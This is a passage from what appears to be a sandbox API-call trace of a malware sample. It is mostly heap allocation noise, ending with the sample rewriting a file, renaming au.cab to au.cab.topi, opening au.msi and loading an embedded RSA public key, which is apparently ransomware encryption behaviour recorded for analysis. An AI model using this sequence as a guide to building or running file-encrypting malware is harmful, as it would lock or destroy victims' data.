returned 0x99e1b68 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbda0 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbde8 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50f0 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.249] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5138 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5120 [0098.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.250] GetCurrentThreadId () returned 0x8c4 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fab20 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df668 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.250] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.250] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.251] GetCurrentThreadId () returned 0x8c4 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0098.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.251] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5150 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.252] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df668 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50f0 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbde8 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.255] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x25800, lpOverlapped=0x0) returned 1 [0098.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.255] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.255] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0098.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.256] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.256] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.256] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.257] CloseHandle (hObject=0x6a8) returned 1 [0098.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4718 [0098.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0098.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4718 | out: hHeap=0x680000) returned 1 [0098.267] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.topi")) returned 1 [0098.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.268] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.270] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0098.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df668 [0098.270] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0098.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df668 | out: hHeap=0x680000) returned 1 [0098.270] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0098.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.271] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=185344) returned 1 [0098.271] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.274] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.274] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.276] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.276] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x25805, lpOverlapped=0x0) returned 1 [0098.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0098.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.278] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.278] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df668) returned 1 [0098.279] CryptCreateHash (in: hProv=0x6df668, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.279] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.279] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.279] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.279] GetLastError () returned 0x0 [0098.280] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.280] CryptReleaseContext (hProv=0x6df668, dwFlags=0x0) returned 1 [0098.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.280] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.280] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.280] RpcStringFreeA (in: String=0x9ccfa40 | out: 